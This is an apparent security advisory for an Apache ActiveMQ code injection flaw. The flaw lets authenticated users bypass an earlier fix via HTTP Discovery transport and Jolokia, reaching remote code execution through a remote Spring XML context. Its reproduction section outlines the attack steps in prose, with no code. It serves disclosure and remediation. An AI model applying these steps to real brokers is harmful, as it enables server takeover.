Apache ActiveMQ Code Injection Vulnerability Allowing Arbitrary Code Execution

A code injection vulnerability has been identified in Apache ActiveMQ Broker and Apache ActiveMQ All, affecting versions prior to 5.19.6 and 6.0.0 prior to 6.2.5. This vulnerability allows an authenticated attacker to bypass previous security fixes by adding a connector through HTTP Discovery transport via BrokerView.addNetworkConnector or BrokerView.addConnector, if the activemq-http module is available. Exploitation involves returning a VM transport through a crafted HTTP URI, which can then be used to load a remote Spring XML application context, leading to arbitrary code execution on the broker's JVM.

Impact

Exploitation of this vulnerability allows for arbitrary code execution on the broker's JVM.

Reproduction

To reproduce this vulnerability, an authenticated user can send a request to the ActiveMQ broker's Jolokia JMX-HTTP bridge with a crafted discovery URI that includes a VM transport. This can be done using the BrokerView.addNetworkConnector or BrokerView.addConnector methods, through Jolokia, if the activemq-http module is on the classpath. The crafted URI should point to a malicious HTTP endpoint that returns a VM transport, bypassing the validation introduced in CVE-2026-34197. Once the VM transport is accepted, the brokerConfig parameter can be used to load a remote Spring XML application context, triggering the arbitrary code execution.

Remediation

Users are advised to upgrade to Apache ActiveMQ versions 5.19.6 or 6.2.5, which address this vulnerability.